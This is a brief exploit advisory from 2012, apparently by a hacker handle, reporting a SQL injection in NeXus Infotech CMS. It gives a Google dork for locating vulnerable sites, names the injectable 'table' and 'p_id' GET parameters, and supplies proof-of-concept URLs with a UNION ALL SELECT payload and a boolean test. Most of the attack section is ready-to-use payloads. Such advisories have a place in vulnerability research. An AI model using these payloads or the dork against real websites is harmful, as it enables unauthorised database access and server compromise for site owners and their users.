#  Exploit title : NeXus Infotech CMS SQL Injection Vulnerability
#  Date : May 05,2012
#  Author : gr00ve_hack3r
#  Contact : groove.hacker7/a/t/gmail.com
#  Homepage : www.gr00ve-hack3r.com
#  Vendor : NeXus Infotech
#  Vendor Site : http://www.nexusinfotech.org/
#  Google Dork : intext:"Powered By NeXus Infotech"

#  Vulnerability :

GET parameter " table " and " p_id " accept unsanitised user input and
result in SQL injection which can lead to server compromise

#  PoC Exploit :

[+] http://[host].com/index.php?pagename=photogallery&table=photogallery
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2